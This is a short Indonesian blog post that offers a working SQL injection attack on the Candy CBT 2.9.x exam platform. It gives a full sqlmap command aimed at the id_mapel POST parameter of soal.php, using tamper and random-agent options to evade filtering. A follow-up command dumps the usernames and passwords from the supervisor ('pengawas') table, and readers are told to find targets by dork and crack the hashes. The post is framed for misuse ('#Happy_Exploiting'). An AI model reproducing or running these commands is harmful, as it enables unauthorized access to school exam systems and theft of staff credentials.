Exploit Candy CBT Sql POST Injection 2.9.x


 

Yah langsung aja dah...

Dork: (Pakai yang content sebelumnya)

Tool: Sqlmap, Decrypt

Link : Decrypt

Payload: sqlmap.py -u "http://target,com/soal.php" --method POST --data "pg=ragu&id_mapel=1*&id_siswa=1&id_soal=1&id_ujian=1" -v 3 --random-agent --level 2 --risk 2 --tamper randomcase,between --batch -dbs --dbms mysql --thread 10

Get User/Pass: -D nama_database -T pengawas -C username,password --dump (Ganti -dbs dengan Payload Ini)


Versi Video : 



#Happy_Exploiting #Candy_CBT_Exploit

Posting Komentar

1 Komentar

Emoji
(y)
:)
:(
hihi
:-)
:D
=D
:-d
;(
;-(
@-)
:P
:o
:>)
(o)
:p
(p)
:-s
(m)
8-)
:-t
:-b
b-(
:-#
=p~
x-)
(k)